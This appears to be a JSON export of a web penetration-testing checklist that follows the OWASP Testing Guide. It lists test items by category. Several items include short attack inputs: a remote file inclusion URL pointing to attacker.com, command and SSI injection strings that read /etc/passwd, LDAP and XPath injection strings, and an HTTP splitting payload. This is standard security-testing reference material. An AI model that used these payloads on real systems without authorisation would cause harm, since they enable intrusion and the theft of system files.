{"targets":[],"libraries":[{"id":"0cd0efbc-8bff-48f5-b7df-dd5ec569e832","title": "OWASP Testing Checklist","folders":[{"id":"7d9e5c30-a227-41e6-bb59-d415d333ffa7","title":"Information Gathering","checklist":[{"id":"040070e2-1fc7-42d8-9ad6-999dded57c4e","title":"Conduct Search Engine Discovery and Reconnaissance for Information Leakage [OTG-INFO-001]","content":"\u003cp\u003eUse a search engine to search for Network diagrams and Configurations, Credentials, Error message content.\u003c/p\u003e"},{"id":"61533992-ed61-4894-91ab-58e0ab27a8c5","title":"Fingerprint Web Server [OTG-INFO-002]","content":"\u003cp\u003eFind the version and type of a running web server to determine known vulnerabilities and the appropriate exploits. Using\u003cbr\u003e\"HTTP header field ordering\" and \"Malformed requests test\".\u003c/p\u003e"},{"id":"ba810c0e-9886-4463-ac87-8634e93ecb0b","title":"Review Webserver Metafiles for Information Leakage [OTG-INFO-003]","content":"\u003cp\u003eAnalyze robots.txt and identify \u003cMETA\u003e Tags from website.\u003c/p\u003e"},{"id":"52373732-ee7c-4bf5-9aa5-3030581089d4","title":"Enumerate Applications on Webserver [OTG-INFO-004]","content":"\u003cp\u003eFind applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers\u003c/p\u003e"},{"id":"92b8247b-08d0-46aa-b698-ddecce731ce5","title":"Review Webpage Comments and Metadata for Information Leakage [OTG-INFO-005]","content":"\u003cp\u003eFind sensitive information from webpage comments and Metadata on source code.\u003c/p\u003e"},{"id":"7b63080a-ba7a-4611-9299-dafa0296008d","title":"Identify application entry points [OTG-INFO-006]","content":"\u003cp\u003eIdentify from hidden fields, parameters, methods HTTP header analysis\u003c/p\u003e"},{"id":"b337fff9-2863-4cd6-a466-b9ab4814f448","title":"Map execution paths through application [OTG-INFO-007]","content":"\u003cp\u003eMap the target application and understand the principal workflows.\u003c/p\u003e"},{"id":"c876a7ca-64f3-4890-8321-2e1304ee94b5","title":"Fingerprint Web Application Framework [OTG-INFO-008]","content":"\u003cp\u003eFind the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders.\u003c/p\u003e"},{"id":"46f39364-94aa-41d2-b35a-1653eef12ee0","title":"Fingerprint Web Application [OTG-INFO-009]","content":"\u003cp\u003eIdentify the web application and version to determine known vulnerabilities and the appropriate exploits.\u003c/p\u003e"},{"id":"f9530601-fcf0-4473-926a-6583a721362c","title":"Map Application Architecture [OTG-INFO-010]","content":"\u003cp\u003eIdentify application architecture including Web language, WAF, Reverse proxy, Application Server, Backend Database\u003c/p\u003e"}]},{"id":"05264ea4-bb36-449a-bcb4-7f05d2b55328","title":"Configuration and Deploy Management Testing","checklist":[{"id":"4ee96858-a706-46a4-84fe-e3a265ed7069","title":"Test Network/Infrastructure Configuration [OTG-CONFIG-001]","content":"\u003cp\u003eUnderstand the infrastructure elements interactions, config management for software, backend DB server, WebDAV, FTP in order to identify known vulnerabilities.\u003c/p\u003e"},{"id":"8fc4c530-127e-4b24-aa37-f6db2e86ed11","title":"Test Application Platform Configuration [OTG-CONFIG-002]","content":"\u003cp\u003eIdentify default installation file/directory, Handle Server errors (40*,50*), Minimal Privilege, Software logging.\u003c/p\u003e"},{"id":"e9d10626-d2a7-4128-91d0-b0648af6ad75","title":"Test File Extensions Handling for Sensitive Information [OTG-CONFIG-003]","content":"\u003cp\u003eFind important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc)\u003c/p\u003e"},{"id":"0ed91649-9c25-4667-b958-977d37e62f81","title":"Backup and Unreferenced Files for Sensitive Information [OTG-CONFIG-004]","content":"\u003cp\u003eCheck JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename\u003c/p\u003e"},{"id":"23721906-107a-45b2-afdd-e3811c732010","title":"Enumerate Infrastructure and Application Admin Interfaces [OTG-CONFIG-005]","content":"\u003cp\u003eDirectory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)\u003c/p\u003e"},{"id":"8a99a1a4-91b9-4bf6-9718-6254be3bb669","title":"Test HTTP Methods [OTG-CONFIG-006]","content":"\u003cp\u003eIdentify HTTP allowed methods on Web server with OPTIONS. Arbitrary HTTP Methods, HEAD access control bypass and XST\u003c/p\u003e"},{"id":"e010cbcb-97e9-4a03-9f93-8d21bb941dce","title":"Test HTTP Strict Transport Security [OTG-CONFIG-007]","content":"\u003cp\u003eIdentify HSTS header on Web server through HTTP response header. \u003cbr\u003ecurl -s -D- https://domain.com/ | grep Strict\u003c/p\u003e"},{"id":"9593e632-d402-4b6b-89d3-bf1da3c597bd","title":"Test RIA cross domain policy [OTG-CONFIG-008]","content":"\u003cp\u003eAnalyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.\u003c/p\u003e"}]},{"id":"0057517f-5c54-402c-9093-51e52912e156","title":"Identity Management Testing","checklist":[{"id":"703d7cad-33f5-4cc0-a52f-936ede1df481","title":"Test Role Definitions [OTG-IDENT-001]","content":"\u003cp\u003eValidate the system roles defined within the application by creating permission matrix.\u003c/p\u003e"},{"id":"da163849-1040-4992-aa26-33efd8ca0ad8","title":"Test User Registration Process [OTG-IDENT-002]","content":"\u003cp\u003eVerify that the identity requirements for user registration are aligned\u003cbr\u003ewith business and security requirements:\u003c/p\u003e"},{"id":"3154edbb-f2b9-4f45-8941-01a4e5a88b45","title":"Test Account Provisioning Process [OTG-IDENT-003]","content":"\u003cp\u003eDetermine which roles are able to provision users and what sort of\u003cbr\u003eaccounts they can provision.\u003c/p\u003e"},{"id":"26ff7541-4ea0-4a18-b2d5-975fb25f902e","title":"Testing for Account Enumeration and Guessable User Account [OTG-IDENT-004]","content":"\u003cp\u003eGeneric login error statement check, return codes/parameter values, enumerate all possible valid userids (Login system, Forgot password)\u003c/p\u003e"},{"id":"aa6989b1-c75c-4302-aba1-debb46fb4a63","title":"Testing for Weak or unenforced username policy [OTG-IDENT-005]","content":"\u003cp\u003eUser account names are often highly structured (e.g. Joe Bloggs\u003cbr\u003eaccount name is jbloggs and Fred Nurks account name is fnurks)\u003cbr\u003eand valid account names can easily be guessed.\u003c/p\u003e"},{"id":"76bda38f-c33f-466c-9dd4-c76b3be1bb73","title":"Test Permissions of Guest/Training Accounts [OTG-IDENT-006]","content":"\u003cp\u003eGuest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorisation process required for access.Evaluate consistency between access policy and guest/training account access permissions.\u003c/p\u003e"},{"id":"670b617d-bc63-4b4c-b3f3-92eb28dcfb95","title":"Test Account Suspension/Resumption Process [OTG-IDENT-007]","content":"\u003cp\u003eVerify the identity requirements for user registration align with business/security requirements. Validate the registration process.\u003c/p\u003e"}]},{"id":"0e8f7689-ec98-4a7a-bf12-240d03753932","title":"Authentication Testing","checklist":[{"id":"3655e131-b9a3-476e-a1dc-4a52575e3070","title":"Testing for Credentials Transported over an Encrypted Channel [OTG-AUTHN-001]","content":"\u003cp\u003eCheck referrer whether its HTTP or HTTPs. Sending data through HTTP and HTTPS.\u003c/p\u003e"},{"id":"f786c6df-f9fd-40b2-8d52-314469cdaae2","title":"Testing for default credentials [OTG-AUTHN-002]","content":"\u003cp\u003eTesting for default credentials of common applications, Testing for default password of new accounts.\u003c/p\u003e"},{"id":"c629a94d-556e-4048-b9bb-690352e82dbb","title":"Testing for Weak lock out mechanism [OTG-AUTHN-003]","content":"\u003cp\u003eEvaluate the account lockout mechanism’s ability to mitigate\u003cbr\u003ebrute force password guessing. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.\u003c/p\u003e"},{"id":"9a3bb90b-8d68-4ae3-a731-7f68856d3c42","title":"Testing for bypassing authentication schema [OTG-AUTHN-004]","content":"\u003cp\u003eForce browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection\u003c/p\u003e"},{"id":"d48e6f3b-bfec-49c6-b4ff-e4c22e04b0d5","title":"Test remember password functionality [OTG-AUTHN-005]","content":"\u003cp\u003eLook for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?\u003c/p\u003e"},{"id":"cbfc115a-4715-4338-bc20-9db8579d5778","title":"Testing for Browser cache weakness [OTG-AUTHN-006]","content":"\u003cp\u003eCheck browser history issue by clicking \"Back\" button after logging out. Check browser cache issue from HTTP response headers (Cache-Control: no-cache)\u003c/p\u003e"},{"id":"c395a8c1-ec09-4f06-9953-5a0db8bf18f0","title":"Testing for Weak password policy [OTG-AUTHN-007]","content":"\u003cp\u003eDetermine the resistance of the application against brute force\u003cbr\u003epassword guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of\u003cbr\u003epasswords.\u003c/p\u003e"},{"id":"426e60c3-c6d5-4fd5-b556-08988379dd94","title":"Testing for Weak security question/answer [OTG-AUTHN-008]","content":"\u003cp\u003eTesting for weak pre-generated questions, Testing for weak self-generated question, Testing for brute-forcible answers (Unlimited attempts?)\u003c/p\u003e"},{"id":"e9c5ecbe-1df5-4bc4-b7d8-0f86f37e24ff","title":"Testing for weak password change or reset functionalities [OTG-AUTHN-009]","content":"\u003cp\u003eTest password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?), Test password change (Need old password?), CSRF vulnerability ?\u003c/p\u003e"},{"id":"3febd48e-1ebf-4894-aa1e-0e39aba7a57d","title":"Testing for Weaker authentication in alternative channel [OTG-AUTHN-010]","content":"\u003cp\u003eUnderstand the primary mechanism and Identify other channels (Mobile App, Call center, SSO)\u003c/p\u003e"}]},{"id":"9c5700ad-944c-425f-9d0e-8a9b071584f1","title":"Authorization Testing ","checklist":[{"id":"11f52e32-647a-4e51-95b5-22626383558d","title":"Testing Directory traversal/file include [OTG-AUTHZ-001]","content":"\u003cp\u003edot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote File Inclusion.\u003c/p\u003e"},{"id":"aa511e18-bae5-4b77-bef7-5cfc7b57a316","title":"Testing for bypassing authorization schema [OTG-AUTHZ-002]","content":"\u003cp\u003eAccess a resource without authentication?, Bypass ACL, Force browsing (/admin/adduser.jsp)\u003c/p\u003e"},{"id":"a8606baa-fe24-4bef-ab3a-ebdf06597b7f","title":"Testing for Privilege Escalation [OTG-AUTHZ-003]","content":"\u003cp\u003eTesting for role/privilege manipulate the values of hidden variables. Change some param groupid=2 to groupid=1\u003c/p\u003e"},{"id":"f75fb6ec-a5c8-40ec-9df5-e71e91e4f2ba","title":"Testing for Insecure Direct Object References [OTG-AUTHZ-004]","content":"\u003cp\u003eForce changing parameter value (?invoice=123 -\u003e ?invoice=456)\u003c/p\u003e"}]},{"id":"1cc0e42c-d038-41e3-b05f-b09712294c54","title":"Session Management Testing","checklist":[{"id":"fd0c3104-1967-43b6-bca5-eec6cf62c979","title":"Testing for Bypassing Session Management Schema [OTG-SESS-001]","content":"\u003cp\u003eSessionID analysis prediction, unencrypted cookie transport, brute-force.\u003c/p\u003e"},{"id":"1aad4abe-52db-44dd-bf6f-0295c005ebb7","title":"Testing for Cookies attributes [OTG-SESS-002]","content":"\u003cp\u003eCheck HTTPOnly and Secure flag, expiration, inspect for sensitive data.\u003c/p\u003e"},{"id":"4cd6a7db-0798-4bda-8c55-66f5e7802050","title":"Testing for Session Fixation [OTG-SESS-003]","content":"\u003cp\u003eThe application doesn't renew the cookie after a successfully user authentication.\u003c/p\u003e"},{"id":"b45dfe6a-805c-40db-8700-644b38375876","title":"Testing for Exposed Session Variables [OTG-SESS-004]","content":"\u003cp\u003eEncryption \u0026 Reuse of session Tokens vulnerabilities, Send sessionID with GET method ?\u003c/p\u003e"},{"id":"ed50a16e-4b55-4a75-a9a8-d9200048c534","title":"Testing for Cross Site Request Forgery [OTG-SESS-005]","content":"\u003cp\u003eURL analysis, Direct access to functions without any token.\u003c/p\u003e"},{"id":"27fdd3b0-d5a3-4f0d-aa85-3e97bf39994d","title":"Testing for logout functionality [OTG-SESS-006]","content":"\u003cp\u003eCheck reuse session after logout both server-side and SSO.\u003c/p\u003e"},{"id":"4d65bee7-8f06-4038-b0b0-a511cae15fe4","title":"Test Session Timeout [OTG-SESS-007]","content":"\u003cp\u003eCheck session timeout, after the timeout has passed, all session tokens should be destroyed or be unusable.\u003c/p\u003e"},{"id":"9505b6d0-8e80-41e4-a0cf-608f9d8bd8f3","title":"Testing for Session puzzling [OTG-SESS-008]","content":"\u003cp\u003eThe application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.\u003c/p\u003e"}]},{"id":"d1bd985e-b315-4cf3-a60a-6ed7d5f0e7f5","title":"Data Validation Testing","checklist":[{"id":"e1264c39-c1a9-4a54-ac44-2fb79098d0bf","title":"Testing for Reflected Cross Site Scripting [OTG-INPVAL-001]","content":"\u003cp\u003eCheck for input validation, Replace the vector used to identify XSS, XSS with HTTP Parameter Pollution.\u003c/p\u003e"},{"id":"c1f1ae0b-2d6c-4a61-8dc7-e314cd73b1e8","title":"Testing for Stored Cross Site Scripting [OTG-INPVAL-002]","content":"\u003cp\u003eCheck input forms/Upload forms and analyze HTML codes, Leverage XSS with BeEF\u003c/p\u003e"},{"id":"c8786c4c-408c-425d-a6dd-c38c2c0e71ef","title":"Testing for HTTP Verb Tampering [OTG-INPVAL-003]","content":"\u003cp\u003eCraft custom HTTP requests to test the other methods to bypass URL authentication and authorization.\u003c/p\u003e"},{"id":"a21707e3-1eba-4ef4-ac0f-85e945a47214","title":"Testing for HTTP Parameter pollution [OTG-INPVAL-004]","content":"\u003cp\u003eIdentify any form or action that allows user-supplied input to bypass Input validation and filters using HPP\u003c/p\u003e"},{"id":"2f2941d7-8def-40d1-b654-f5cb8cd73f82","title":"Testing for SQL Injection [OTG-INPVAL-005]","content":"\u003cp\u003eUnion, Boolean, Error based, Out-of-band, Time delay.\u003c/p\u003e"},{"id":"ca6798e5-481a-422e-babe-63f4d3bbbfdd","title":"Oracle Testing","content":"\u003cp\u003eIdentify URLs for PL/SQL web applications, Access with PL/SQL Packages, Bypass PL/SQL Exclusion list, SQL Injection\u003c/p\u003e"},{"id":"bd0090d3-45e7-4fdc-a09b-a09837f9a5fa","title":"MySQL Testing","content":"\u003cp\u003eIdentify MySQL version, Single quote, Information_schema, Read/Write file.\u003c/p\u003e"},{"id":"de582ff5-c743-4362-a343-d59d0fb84ac3","title":"SQL Server Testing","content":"\u003cp\u003eComment operator (- -), Query separator (;), Stored procedures (xp_cmdshell)\u003c/p\u003e"},{"id":"6cbb1d28-4063-4006-8a1f-79968ec744b3","title":"Testing PostgreSQL","content":"\u003cp\u003eDetermine that the backend database engine is PostgreSQL by using the :: cast operator. Read/Write file, Shell Injection (OS command)\u003c/p\u003e"},{"id":"b06cab16-a91f-4636-aa83-9a8b8f328c3f","title":"MS Access Testing","content":"\u003cp\u003eEnumerate the column through error-based (Group by), Obtain database schema combine with fuzzdb.\u003c/p\u003e"},{"id":"02123845-dee2-43aa-9854-75dad240ea4f","title":"Testing for NoSQL injection","content":"\u003cp\u003eIdentify NoSQL databases, Pass special characters (' \" \\ ; { } ), Attack with reserved variable name, operator.\u003c/p\u003e"},{"id":"4d637f64-2147-48aa-8183-a241311536c4","title":"Testing for LDAP Injection [OTG-INPVAL-006]","content":"\u003cp\u003e/ldapsearch?user=*\u003cbr\u003euser=*user=*)(uid=*))(|(uid=*\u003cbr\u003epass=password\u003c/p\u003e"},{"id":"fdc0859c-f4d0-4adc-8007-71aa410a3df3","title":"Testing for ORM Injection [OTG-INPVAL-007]","content":"\u003cp\u003eTesting ORM injection is identical to SQL injection testing\u003c/p\u003e"},{"id":"6024abeb-0235-49d3-831b-7def7e4610e2","title":"Testing for XML Injection [OTG-INPVAL-008]","content":"\u003cp\u003eCheck with XML Meta Characters\u003cbr\u003e', \" , \u003c\u003e, \u003c!--/--\u003e, \u0026, \u003c![CDATA[ / ]]\u003e, XXE, TAG\u003c/p\u003e"},{"id":"1c7381de-c210-4d2a-9526-e35777fbfb3b","title":"Testing for SSI Injection [OTG-INPVAL-009]","content":"\u003cp\u003e• Presense of .shtml extension\u003cbr\u003e• Check for these characters\u003cbr\u003e\u003c ! # = / . \" - \u003e and [a-zA-Z0-9]\u003cbr\u003e• include String = \u003c!--#include virtual=\"/etc/passwd\" --\u003e\u003c/p\u003e"},{"id":"ae0dd359-ee9e-459d-a6c1-67dfa3b862ee","title":"Testing for XPath Injection [OTG-INPVAL-010]","content":"\u003cp\u003eCheck for XML error enumeration by supplying a single quote (')\u003cbr\u003eUsername: ‘ or ‘1’ = ‘1\u003cbr\u003ePassword: ‘ or ‘1’ = ‘1\u003c/p\u003e"},{"id":"92e7a83e-aebb-4592-b68e-b72efd861f28","title":"IMAP/SMTP Injection [OTG-INPVAL-011]","content":"\u003cp\u003e• Identifying vulnerable parameters with special characters\u003cbr\u003e(i.e.: \\, ‘, “, @, #, !, |)\u003cbr\u003e• Understanding the data flow and deployment structure of the client\u003cbr\u003e• IMAP/SMTP command injection (Header, Body, Footer)\u003c/p\u003e"},{"id":"dd55f2e8-2664-4366-b10c-85012afadb5e","title":"Testing for Code Injection [OTG-INPVAL-012]","content":"\u003cp\u003eEnter OS commands in the input field.\u003cbr\u003e?arg=1; system('id')\u003c/p\u003e"},{"id":"e49829a4-c44c-4ad4-b602-078331ad1861","title":"Testing for Local File Inclusion","content":"\u003cp\u003eLFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource)\u003c/p\u003e"},{"id":"76cbd786-48a6-49bc-81cc-aa746ec1d3af","title":"Testing for Remote File Inclusion","content":"\u003cp\u003eRFI from malicious URL\u003cbr\u003e?page.php?file=http://attacker.com/malicious_page\u003c/p\u003e"},{"id":"8895f1b0-b432-476f-b070-919edb56db8b","title":"Testing for Command Injection [OTG-INPVAL-013]","content":"\u003cp\u003eUnderstand the application platform, OS, folder structure, relative path and execute OS commands on a Web server.\u003cbr\u003e%3Bcat%20/etc/passwd\u003cbr\u003etest.pdf+|+Dir C:\\\u003c/p\u003e"},{"id":"d54cab52-9c37-41b3-a57f-871aaa4dbdae","title":"Testing for Buffer overflow [OTG-INPVAL-014]","content":"\u003cp\u003e• Testing for heap overflow vulnerability\u003cbr\u003e• Testing for stack overflow vulnerability\u003cbr\u003e• Testing for format string vulnerability\u003c/p\u003e"},{"id":"1b7f19da-c158-4ff7-bfe9-5aca3b85f08a","title":"Testing for Heap overflow","content":"\u003cp\u003e\u003c/p\u003e"},{"id":"005bde1e-e1c5-4227-bb9d-0d8480fcf9ac","title":"Testing for Stack overflow","content":"\u003cp\u003e\u003c/p\u003e"},{"id":"86dbf185-2ed7-41dc-9c82-66606da8f23e","title":"Testing for Format string","content":"\u003cp\u003e\u003c/p\u003e"},{"id":"517220c3-f3b8-4911-8abe-f80711f46245","title":"Testing for incubated vulnerabilities [OTG-INPVAL-015]","content":"\u003cp\u003eFile Upload, Stored XSS , SQL/XPATH Injection, Misconfigured servers (Tomcat, Plesk, Cpanel)\u003c/p\u003e"},{"id":"01aa5617-e7e1-4858-aa53-0a86b5c78c7f","title":"Testing for HTTP Splitting/Smuggling [OTG-INPVAL-016]","content":"\u003cp\u003eparam=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a\u003chtml\u003eSorry,%20System%20Down\u003c/html\u003e\u003c/p\u003e"}]},{"id":"d83f5968-7c16-4eb6-b118-89780a3b5afd","title":"Error Handling","checklist":[{"id":"81e0cecc-495b-4713-a043-96eb408ab67f","title":"Analysis of Error Codes [OTG-ERR-001]","content":"\u003cp\u003eLocate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)\u003c/p\u003e"},{"id":"f312ec25-8af8-467c-bf55-939eb1e11741","title":"Analysis of Stack Traces [OTG-ERR-002]","content":"\u003cp\u003e• Invalid Input / Empty inputs\u003cbr\u003e• Input that contains non alphanumeric characters or query syn\u003cbr\u003etax\u003cbr\u003e• Access to internal pages without authentication\u003cbr\u003e• Bypassing application flow\u003c/p\u003e"}]},{"id":"66f06ef3-129d-4c81-9251-2dc2ce70e7d7","title":"Cryptography","checklist":[{"id":"44d8cbeb-3bc7-4924-8c98-df524f532a41","title":"Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection [OTG-CRYPST-001]","content":"\u003cp\u003eIdentify SSL service, Idectify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)\u003c/p\u003e"},{"id":"923a59e1-458e-4929-a1c7-52130dc26b49","title":"Testing for Padding Oracle [OTG-CRYPST-002]","content":"\u003cp\u003eCompare the responses in three different states:\u003cbr\u003e• Cipher text gets decrypted, resulting data is correct.\u003cbr\u003e• Cipher text gets decrypted, resulting data is garbled and causes\u003cbr\u003esome exception or error handling in the application logic.\u003cbr\u003e• Cipher text decryption fails due to padding errors.\u003c/p\u003e"},{"id":"99e46660-2ab2-4078-89fd-7d92931c8edc","title":"Testing for Sensitive information sent via unencrypted channels [OTG-CRYPST-003]","content":"\u003cp\u003eCheck sensitive data during the transmission:\u003cbr\u003e• Information used in authentication (e.g. Credentials, PINs, Session\u003cbr\u003eidentifiers, Tokens, Cookies…)\u003cbr\u003e• Information protected by laws, regulations or specific organizational\u003cbr\u003epolicy (e.g. Credit Cards, Customers data)\u003c/p\u003e"}]},{"id":"25dcc3d1-99fa-48ce-8ba7-9bd23b3509e8","title":"Business logic Testing","checklist":[{"id":"42c90230-5081-490f-8494-29a717cd2790","title":"Test Business Logic Data Validation [OTG-BUSLOGIC-001]","content":"\u003cp\u003e• Looking for data entry points or hand off points between systems or software.\u003cbr\u003e• Once found try to insert logically invalid data into the application/system. \u003c/p\u003e"},{"id":"1b19c429-1610-410d-8417-06e0779c4546","title":"Test Ability to Forge Requests [OTG-BUSLOGIC-002]","content":"\u003cp\u003e• Looking for guessable, predictable or hidden functionality of fields.\u003cbr\u003e• Once found try to insert logically valid data into the application/system allowing the user go through the application/system against the normal busineess logic workflow. \u003c/p\u003e"},{"id":"af3b0304-2cc3-497e-a5b4-dda4f605f415","title":"Test Integrity Checks [OTG-BUSLOGIC-003]","content":"\u003cp\u003e•Looking for parts of the application/system (components i.e. For example, input fields, databases or logs) that move, store or handle data/information.\u003cbr\u003e• For each identified component determine what type of data/information is logically acceptable and what types the application/system should guard against. Also, consider who according to the business logic is allowed to insert, update and delete data/information and in each component.\u003cbr\u003e• Attempt to insert, update or edit delete the data/information values with invalid data/information into each component (i.e. input, database, or log) by users that .should not be allowed per the busines logic workflow. \u003c/p\u003e"},{"id":"7de42f0d-3661-41ad-8f70-57b582b67096","title":"Test for Process Timing [OTG-BUSLOGIC-004]","content":"\u003cp\u003e• Looking for application/system functionality that may\u003cbr\u003ebe impacted by time. Such as execution time or actions that\u003cbr\u003ehelp users predict a future outcome or allow one to circumvent\u003cbr\u003eany part of the business logic or workflow. For example, not\u003cbr\u003ecompleting transactions in an expected time.\u003cbr\u003e• Develop and execute the mis-use cases ensuring that attackers\u003cbr\u003ecan not gain an advantage based on any timing.\u003c/p\u003e"},{"id":"e5653865-0e60-4aae-834a-5e3107fcd235","title":"Test Number of Times a Function Can be Used Limits [OTG-BUSLOGIC-005]","content":"\u003cp\u003e• Looking for functions or features in the application or system that should not be executed more that a single time or specified number of times during the business logic workflow.\u003cbr\u003e• For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.\u003c/p\u003e"},{"id":"39d7a484-a934-4a0b-92ae-f45748b2af68","title":"Testing for the Circumvention of Work Flows [OTG-BUSLOGIC-006]","content":"\u003cp\u003e• Looking for methods to skip or go to steps in the application process in a different order from the designed/intended business logic flow.\u003cbr\u003e• For each method develop a misuse case and try to circumvent or perform an action that is \"not acceptable\" per the the business logic workflow. \u003c/p\u003e"},{"id":"8d2645ea-b677-498f-94ec-cc59e2ea32b5","title":"Test Defenses Against Application Mis-use [OTG-BUSLOGIC-007]","content":"\u003cp\u003eMeasures that might indicate the application has in-built self-defense:\u003cbr\u003e• Changed responses\u003cbr\u003e• Blocked requests\u003cbr\u003e• Actions that log a user out or lock their account\u003c/p\u003e"},{"id":"330cf5da-7d33-45b5-9189-5b835873725d","title":"Test Upload of Unexpected File Types [OTG-BUSLOGIC-008]","content":"\u003cp\u003e• Review the project documentation and perform some exploratory testing looking for file types that should be \"unsupported\" by the application/system.\u003cbr\u003e• Try to upload these “unsupported” files an verify that it are properly rejected.\u003cbr\u003e• If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. \u003cbr\u003ePS. file.phtml, shell.phPWND, SHELL~1.PHP\u003c/p\u003e"},{"id":"a3b2690c-ab26-47df-a426-3b14e20d0fe3","title":"Test Upload of Malicious Files [OTG-BUSLOGIC-009]","content":"\u003cp\u003e• Develop or acquire a known “malicious” file.\u003cbr\u003e• Try to upload the malicious file to the application/system and verify that it is correctly rejected.\u003cbr\u003e• If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. \u003c/p\u003e"}]}]}],"templates":[],"payloads":[],"messages": {"showDeleteConfirmation": true}}